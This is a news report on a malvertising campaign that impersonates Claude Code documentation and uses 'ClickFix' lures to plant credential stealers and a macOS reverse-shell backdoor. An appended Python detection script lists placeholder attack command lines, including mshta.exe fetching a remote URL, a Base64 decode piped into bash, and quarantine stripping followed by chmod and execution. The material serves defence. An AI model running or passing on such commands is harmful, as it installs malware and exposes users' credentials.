Cybersecurity researchers at Bitdefender have uncovered a high-stakes “maladvertisement” campaign specifically designed to ensnare developers and AI enthusiasts. The campaign exploits the rising popularity of Claude, the large language model (LLM) from Anthropic, by placing malicious sponsored links at the top of search results.
The attack begins when users search for developer tools like “Claude Code”. To the untrained eye, the top result looks perfectly legitimate, complete with official branding and Google’s “Sponsored” badge of trust.
However, instead of reaching Anthropic’s official site, users are redirected to a fake documentation page hosted on a Squarespace subdomain. As Bitdefender notes: “The page copies the real Claude Code Docs layout, navigation structure and styling. Nothing looks suspicious or out of place”.
The trap relies on a social engineering tactic called “ClickFix,” which tricks victims into manually running terminal commands that they believe are for installation, but are actually malicious.
The campaign is uniquely dangerous because it provides custom infection paths depending on the visitor’s operating system:
- Windows Users: Victims are instructed to run a command using mshta.exe, a legitimate Microsoft utility. This triggers the download of a multi-stage payload that includes a powerful credential stealer. Bitdefender identifies these threats as Trojan.Stealer.GJ and Trojan.Stealer.GK.
- macOS Users: The site presents a complex, obfuscated shell command that pipes decoded Base64 strings directly into the terminal. This results in the silent execution of a Mach-O backdoor.
“The system retrieves a Mach-O binary… The script removes extended attributes, grants execution rights, and launches the binary… The malware executes silently,” the report warns.
Technical analysis reveals that the macOS malware is highly sophisticated, utilizing heavy string obfuscation and arithmetic-based decryption loops to hide its purpose. Once active, it acts as a reverse shell, allowing attackers to remotely spawn /bin/bash or /bin/zsh sessions and take full control of the infected machine.
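As an added illustration (not code from the Bitdefender report), the following Python scans constructed process-creation telemetry for the two ClickFix execution patterns the article describes: mshta.exe launched with a remote URL on Windows, and on macOS a Base64 decode piped into a shell followed by extended-attribute stripping and chmod +x before execution. Hostnames, command lines and rule names are assumptions.

```python
import re

# Constructed sample telemetry: one process-creation record per dict.
# The command lines are placeholders shaped like the patterns the report describes.
SAMPLE_EVENTS = [
    {"host": "win-dev-01", "os": "windows",
     "cmdline": "mshta.exe https://docs.example.invalid/setup.hta"},
    {"host": "mac-dev-07", "os": "macos",
     "cmdline": "echo 'UExBQ0VIT0xERVI=' | base64 -d | bash"},
    {"host": "mac-dev-07", "os": "macos",
     "cmdline": "xattr -c /tmp/.setup && chmod +x /tmp/.setup && /tmp/.setup"},
    {"host": "win-dev-02", "os": "windows",
     "cmdline": "git clone https://github.com/example/tool.git"},
    {"host": "mac-dev-03", "os": "macos",
     "cmdline": "base64 -d notes.b64 > notes.txt"},   # benign decode to a file
]

# Detection rules: (rule name, compiled regex over the command line).
RULES = [
    # Windows: mshta.exe handed a remote URL is the classic ClickFix launcher.
    ("mshta_remote_url",
     re.compile(r"\bmshta(\.exe)?\b.*\bhttps?://", re.IGNORECASE)),
    # macOS: base64 decode whose output is piped straight into a shell.
    ("base64_pipe_to_shell",
     re.compile(r"\bbase64\s+(-d|-D|--decode)\b.*\|\s*(bash|zsh|sh)\b")),
    # macOS: stripping extended attributes (quarantine) then marking executable.
    ("xattr_strip_then_chmod_exec",
     re.compile(r"\bxattr\s+(-c|-d\s+com\.apple\.quarantine)\b.*\bchmod\s+\+x\b")),
]


def scan_events(events):
    """Return (host, rule_name) for every event whose command line matches a rule."""
    findings = []
    for event in events:
        for name, pattern in RULES:
            if pattern.search(event["cmdline"]):
                findings.append((event["host"], name))
    return findings


def hosts_with_full_macos_chain(findings):
    """Hosts that hit both macOS stages; two independent stages raise confidence."""
    by_host = {}
    for host, rule in findings:
        by_host.setdefault(host, set()).add(rule)
    needed = {"base64_pipe_to_shell", "xattr_strip_then_chmod_exec"}
    return sorted(h for h, rules in by_host.items() if needed <= rules)


if __name__ == "__main__":
    hits = scan_events(SAMPLE_EVENTS)
    for host, rule in hits:
        print(f"{host}: {rule}")
    print("full macOS chain on:", hosts_with_full_macos_chain(hits))
```

The third rule's `xattr -c` form is broader than the quarantine-only flag, so tune it against your baseline of legitimate packaging scripts before alerting on it alone.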
To bypass Google’s ad scrutiny, the attackers did not create new accounts. Instead, they likely “abused a compromised advertiser account linked to a Malaysian company” that already possessed a history of trust with Google’s platform. Google has since deactivated the compromised account.